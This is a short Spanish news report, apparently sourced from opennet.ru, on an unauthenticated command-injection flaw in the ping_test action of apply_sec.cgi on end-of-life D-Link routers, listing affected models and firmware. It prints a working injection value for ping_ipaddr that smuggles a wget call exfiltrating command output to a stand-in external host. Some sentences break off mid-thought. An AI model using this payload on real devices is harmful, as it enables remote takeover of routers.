En enrutadores inalámbricos D-Link
Curiosamente, según los desarrolladores del firmware, la llamada "ping_test" debe ejecutarse solo después de la autenticación, pero en realidad se llama en cualquier caso, independientemente de iniciar sesión en la interfaz web. En particular, al acceder al script apply_sec.cgi y pasar el parámetro “action=ping_test”, el script redirige a la página de autenticación, pero al mismo tiempo realiza la acción asociada con ping_test. Para ejecutar el código, se utilizó otra vulnerabilidad en el propio ping_test, que llama a la utilidad ping sin comprobar adecuadamente la exactitud de la dirección IP enviada para la prueba. Por ejemplo, para llamar a la utilidad wget y transferir los resultados del comando "echo 1234" a un host externo, simplemente especifique el parámetro "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// prueba.prueba/?$(echo 1234)".
La presencia de la vulnerabilidad ha sido confirmada oficialmente en los siguientes modelos:
- DIR-655 con firmware 3.02b05 o anterior;
- DIR-866L con firmware 1.03b04 o anterior;
- DIR-1565 con firmware 1.01 o anterior;
- DIR-652 (no se proporciona información sobre versiones de firmware problemáticas)
El período de soporte para estos modelos ya expiró, por lo que D-Link
Más tarde se descubrió que la vulnerabilidad también era
Fuente: opennet.ru